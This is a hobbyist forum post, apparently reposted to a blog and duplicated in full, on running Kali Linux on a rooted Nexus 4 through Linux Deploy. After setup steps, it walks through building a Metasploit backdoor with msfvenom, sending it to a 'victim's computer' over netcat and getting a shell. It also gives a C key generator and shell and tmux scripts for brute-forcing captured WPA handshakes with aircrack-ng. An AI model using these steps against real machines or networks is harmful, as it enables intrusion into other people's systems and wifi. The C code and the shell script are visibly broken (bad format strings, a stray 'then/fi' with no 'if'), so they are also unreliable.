Hello everyone !
I was so glad to know the release of Nethunter 1.1 on offensive security, so I immediattely decided to tried it on my Nexus 4. But It didn't really work as Nexus 4 devices doesn't really support USB external devices :/ even if XDA devs did release a patch for this, it made WIFI disapear...
That's why I decided to use Linux Deploy in a new way : I thought this app was really limited, but finally I managed to get something really similar to a Nethunter device !
So here we are, and I'm gonna show you a few steps to install and configure kali linux with some tools !
1) Root your phone
2) Dowload Linux Deploy
3) Download the Kali image BUT :
The installator will automatically generate a 4Gb image in your internal memory - which is relally big - thats why you might have two solutions :
- Use an external sdcard but it would be a waste of memory
- BETTER SOLUTION : Tap on "Image size (MB)" and enter the amount of memory youwant to allocate. I suggest 2200 MB (2,2GB)
Then, go to "Compents to install, and UNCHECK EVERYTHING EXCEPT -> SSH SERVER.
Thanks to this, your linux image will occupate 2,2Gb with a lot of freespace in it, so we'll be able to download some utilities, without getting useless things such as a graphical desktop.
So just click install and wait a few minute for the installation to complete.
So what ?
In order to connect to your new kali environnement you will need an ssh client (for we've only selected the ssh server and no VNC)
So just install a ssh client or use a terminal emulator such as "Terminal IDE" (and not the Jack Palevitch's one whisch has no built in ssh and i really dont like his emulator)
I personally prefer use the ssh client : http://ift.tt/1BN3lVJ
This one is light efficient and not intrusive.
You might also want to install the "Hacker's keyboard" or use the "Terminal IDE"'s one. You'll surely need it, as the arrows, esc and ctrl keys are really useful.
Then, launch your system via the "Launch" button. You should have an output like this one :
http://ift.tt/1BN3lVL
EXCEPT THAT : You've only installed the ssh client so you output should look like : SSH :22 ... done
VNC :5900 ... fail
Awesome.
Now just launch your ssh client :
The default credentials are "android" and "changeme". So infront of "ssh" just type :
[ssh] android@localhost
And when the system ask you for the password , type "changeme".
Just have fun !!
TIP : If the display is too small, just use the volume keys to fix it.
NOW : Some basic steps
1) Checkout the space available : df -h
2) Get root : su
3) Install all the packages you want.
/WARNING\ : Smartphones chipsets doen't allow injection or monitor mode even if a few guys managed to. But iys eally experimental. You can use an external wifi card and heres the tutorial to do it :
http://ift.tt/1LoM6S7
Some things to install to have fun :
- aircrack-ng to break a 4 way handshake (tutorial below)
- Metasploit to send your backdoors (tutorial below)
- Tmux because were limite to only one window (script below)
- GCC to compile
- Vim to edit
1) Get root
For those who have issues to get root just follow these step
sudo passwd root
type twice your password
2) Install the packages :
apt-get install aircrack-ng
apt-get install metasploit
apt-get install metasploit-framework
apt-get install tmux
apt-get install john
3) If you wish to install SET :
cd /opt
sudo apt-get install git
git clone http://ift.tt/1hxnULY set/
cd set/
python setup.py install
Have fun.
THE TUTORIAL PART
You have to consider the fact that you're running a chrooted environment.
So, in order to access to the internal sotrage, yo have to go into Linux Deploy options : Scroll down to "Custom Mounts" and enable it. Then tap on "Mount points" and enable all the path presented. It will allow you, once you've booted your linux img to access all of your phone's data
Now you might i communicate with a pc for example, get your handsake and crack it on your phone, or send a backdoor generated on your phone ?
Here's another solution :
NETCAT. On a linux or windows machine with netcat here's a little metasploit fun :
On your kali PHONE
msfvenom /your/payload/ OPTIONS -a YOUR_ARCH -e exe and some stuff here > mybackdoor
nc -w 3 IPADDRESS_OFDESTINATION < mybackoor
On your victims's computer :
nc -l -p 1234 > mybackdoor
And now, no mattter how you managed to transfer the backdoor -netcat / usb cable/ any other hack - , let's play :
Proof of concept ? Here's a Metasploit shell gained on a linux machine :
AND..... PWNDED !! (yeah that was quite simple...)
Metasploit3
And this Netcat trick works with ANY file.
For example : a captured handshake on a kali pc ! Tip : You can reduce it size with wpaclean :
wpaclean <out.cap> <in.cap>
How to crack the key ? Pipe Crunch into aircrack or john OR use this program if you want to generate HEXADECIMAL keys :
HexKeygenerator
/*
* HexKeygenerator is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published
* by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
*
* HexKeygenerator is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along with Foobar. If not, see http://ift.tt/ytFmsU.
*
*/
// Autheurs : Sdpbz1 and improved by romeoandjuliet
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
void help(char name[]) {
printf("Usage:%s <Nb keys to generate> <file>\n\n", name);
printf("Exemple: generate 1000000 keys in the file dictionary.wpa\n");
printf("%s 10000000 dictionary.wpa\n", name);
}
int main(int argc, char * argv[])
{
long long int nb;
int size; //Key lenght
double i, z;
int byte = 0;
FILE *PF1;
if(argc != 4) {
help(argv[0]);
return 1;
}
//Convert to long and check
nb = atol(argv[1]);
if(nb == 0) {
printf("Please enter a valid number !!!\n");
help(argv[0]);
return 1;
}
size = atol(argv[3]);
if(nb == 0) {
printf("Please enter a valid number\n");
help(argv[0]);
return 1;
}
PF1 = fopen(argv[2], "w");
if (PF1 == NULL) {
printf("Cant create file %s\n", argv[2]);
return 1;
}
printf("Générating de %d hexadecimal keys\n", nb);
srand(time(NULL));
for(z = 1; z <= nb; z++) {
for (i = 1; i <= size; i++) {
byte = rand() % 256;
fprintf(PF1,"X", byte); //Hex display
}
if(z % 100000 == 0) {
printf("%l keys generated\n", z); // }
fprintf(PF1,"\n");
}
fclose(PF1);
return 0;
}
To compile it :
gcc HexKeygnerator.c -o HexKeygnerator
Here's a first script to handle the crack : startup.sh
for i in `seq 1 1000000``
do
./HexKeygenerator 1000000 password$i.lst 5 # for a 10 char hexadecimal key
aircrack-ng /path/to/handshake -e ESSID -w password$i.lst -p #NBOF_CORES >> log.txt # IF YOU USE ALL CORES AVAILABLE YOUR PHONE WILL ALMOST FREEZE
rm password$i.lst
then
grep "KEY FOUND" log.txt > KEY_FOUND # On sauve la clé
grep "KEY FOUND" log.txt
grep "KEY FOUND" log.txt
fi
done
To have this run and be checked permanently in a TMUX session : Use this script and it ill automatically launch the previos script (save both in the same directory)
SESSION=$USER
tmux split-window -h
tmux select-pane -t 0
tmux send-keys "sh ./startup.sh" C-m
tmux select-pane -t 1
tmux send-keys "Watch -n 30 grep KEY log.txt" C-m
tmux split-window -v
tmux send-keys "Watch -n 30 tail log.txt" C-m # to check the cracking's speed
tmux select-window -t $SESSION:1
tmux -2 attach-session -t $SESSION
Screenshot ? :
And here it is. This is only the beginning ! thaths why i thing linux deploy is better and more modulable than nethunter.
Have fun !!!
If you liked this, please check my little website :) :
http://mindhackingdevices.e-monsite....mier-post.html
Pour les francophones, ce post existe en fracnais ssur l'excellent forum :
http://ift.tt/1LoM4d0
Romeoandjuliet
I was so glad to know the release of Nethunter 1.1 on offensive security, so I immediattely decided to tried it on my Nexus 4. But It didn't really work as Nexus 4 devices doesn't really support USB external devices :/ even if XDA devs did release a patch for this, it made WIFI disapear...
That's why I decided to use Linux Deploy in a new way : I thought this app was really limited, but finally I managed to get something really similar to a Nethunter device !
So here we are, and I'm gonna show you a few steps to install and configure kali linux with some tools !
1) Root your phone
2) Dowload Linux Deploy
3) Download the Kali image BUT :
The installator will automatically generate a 4Gb image in your internal memory - which is relally big - thats why you might have two solutions :
- Use an external sdcard but it would be a waste of memory
- BETTER SOLUTION : Tap on "Image size (MB)" and enter the amount of memory youwant to allocate. I suggest 2200 MB (2,2GB)
Then, go to "Compents to install, and UNCHECK EVERYTHING EXCEPT -> SSH SERVER.
Thanks to this, your linux image will occupate 2,2Gb with a lot of freespace in it, so we'll be able to download some utilities, without getting useless things such as a graphical desktop.
So just click install and wait a few minute for the installation to complete.
So what ?
In order to connect to your new kali environnement you will need an ssh client (for we've only selected the ssh server and no VNC)
So just install a ssh client or use a terminal emulator such as "Terminal IDE" (and not the Jack Palevitch's one whisch has no built in ssh and i really dont like his emulator)
I personally prefer use the ssh client : http://ift.tt/1BN3lVJ
This one is light efficient and not intrusive.
You might also want to install the "Hacker's keyboard" or use the "Terminal IDE"'s one. You'll surely need it, as the arrows, esc and ctrl keys are really useful.
Then, launch your system via the "Launch" button. You should have an output like this one :
http://ift.tt/1BN3lVL
EXCEPT THAT : You've only installed the ssh client so you output should look like : SSH :22 ... done
VNC :5900 ... fail
Awesome.
Now just launch your ssh client :
The default credentials are "android" and "changeme". So infront of "ssh" just type :
[ssh] android@localhost
And when the system ask you for the password , type "changeme".
Just have fun !!
TIP : If the display is too small, just use the volume keys to fix it.
NOW : Some basic steps
1) Checkout the space available : df -h
2) Get root : su
3) Install all the packages you want.
/WARNING\ : Smartphones chipsets doen't allow injection or monitor mode even if a few guys managed to. But iys eally experimental. You can use an external wifi card and heres the tutorial to do it :
http://ift.tt/1LoM6S7
Some things to install to have fun :
- aircrack-ng to break a 4 way handshake (tutorial below)
- Metasploit to send your backdoors (tutorial below)
- Tmux because were limite to only one window (script below)
- GCC to compile
- Vim to edit
1) Get root
For those who have issues to get root just follow these step
sudo passwd root
type twice your password
2) Install the packages :
apt-get install aircrack-ng
apt-get install metasploit
apt-get install metasploit-framework
apt-get install tmux
apt-get install john
3) If you wish to install SET :
cd /opt
sudo apt-get install git
git clone http://ift.tt/1hxnULY set/
cd set/
python setup.py install
Have fun.
THE TUTORIAL PART
You have to consider the fact that you're running a chrooted environment.
So, in order to access to the internal sotrage, yo have to go into Linux Deploy options : Scroll down to "Custom Mounts" and enable it. Then tap on "Mount points" and enable all the path presented. It will allow you, once you've booted your linux img to access all of your phone's data
Now you might i communicate with a pc for example, get your handsake and crack it on your phone, or send a backdoor generated on your phone ?
Here's another solution :
NETCAT. On a linux or windows machine with netcat here's a little metasploit fun :
On your kali PHONE
msfvenom /your/payload/ OPTIONS -a YOUR_ARCH -e exe and some stuff here > mybackdoor
nc -w 3 IPADDRESS_OFDESTINATION < mybackoor
On your victims's computer :
nc -l -p 1234 > mybackdoor
And now, no mattter how you managed to transfer the backdoor -netcat / usb cable/ any other hack - , let's play :
Proof of concept ? Here's a Metasploit shell gained on a linux machine :
AND..... PWNDED !! (yeah that was quite simple...)
Metasploit3
And this Netcat trick works with ANY file.
For example : a captured handshake on a kali pc ! Tip : You can reduce it size with wpaclean :
wpaclean <out.cap> <in.cap>
How to crack the key ? Pipe Crunch into aircrack or john OR use this program if you want to generate HEXADECIMAL keys :
HexKeygenerator
/*
* HexKeygenerator is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published
* by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
*
* HexKeygenerator is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along with Foobar. If not, see http://ift.tt/ytFmsU.
*
*/
// Autheurs : Sdpbz1 and improved by romeoandjuliet
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
void help(char name[]) {
printf("Usage:%s <Nb keys to generate> <file>\n\n", name);
printf("Exemple: generate 1000000 keys in the file dictionary.wpa\n");
printf("%s 10000000 dictionary.wpa\n", name);
}
int main(int argc, char * argv[])
{
long long int nb;
int size; //Key lenght
double i, z;
int byte = 0;
FILE *PF1;
if(argc != 4) {
help(argv[0]);
return 1;
}
//Convert to long and check
nb = atol(argv[1]);
if(nb == 0) {
printf("Please enter a valid number !!!\n");
help(argv[0]);
return 1;
}
size = atol(argv[3]);
if(nb == 0) {
printf("Please enter a valid number\n");
help(argv[0]);
return 1;
}
PF1 = fopen(argv[2], "w");
if (PF1 == NULL) {
printf("Cant create file %s\n", argv[2]);
return 1;
}
printf("Générating de %d hexadecimal keys\n", nb);
srand(time(NULL));
for(z = 1; z <= nb; z++) {
for (i = 1; i <= size; i++) {
byte = rand() % 256;
fprintf(PF1,"X", byte); //Hex display
}
if(z % 100000 == 0) {
printf("%l keys generated\n", z); // }
fprintf(PF1,"\n");
}
fclose(PF1);
return 0;
}
To compile it :
gcc HexKeygnerator.c -o HexKeygnerator
Here's a first script to handle the crack : startup.sh
for i in `seq 1 1000000``
do
./HexKeygenerator 1000000 password$i.lst 5 # for a 10 char hexadecimal key
aircrack-ng /path/to/handshake -e ESSID -w password$i.lst -p #NBOF_CORES >> log.txt # IF YOU USE ALL CORES AVAILABLE YOUR PHONE WILL ALMOST FREEZE
rm password$i.lst
then
grep "KEY FOUND" log.txt > KEY_FOUND # On sauve la clé
grep "KEY FOUND" log.txt
grep "KEY FOUND" log.txt
fi
done
To have this run and be checked permanently in a TMUX session : Use this script and it ill automatically launch the previos script (save both in the same directory)
SESSION=$USER
tmux split-window -h
tmux select-pane -t 0
tmux send-keys "sh ./startup.sh" C-m
tmux select-pane -t 1
tmux send-keys "Watch -n 30 grep KEY log.txt" C-m
tmux split-window -v
tmux send-keys "Watch -n 30 tail log.txt" C-m # to check the cracking's speed
tmux select-window -t $SESSION:1
tmux -2 attach-session -t $SESSION
Screenshot ? :
And here it is. This is only the beginning ! thaths why i thing linux deploy is better and more modulable than nethunter.
Have fun !!!
If you liked this, please check my little website :) :
http://mindhackingdevices.e-monsite....mier-post.html
Pour les francophones, ce post existe en fracnais ssur l'excellent forum :
http://ift.tt/1LoM4d0
Romeoandjuliet
from xda-developers http://ift.tt/1BN3oRf
via IFTTT
Aucun commentaire:
Enregistrer un commentaire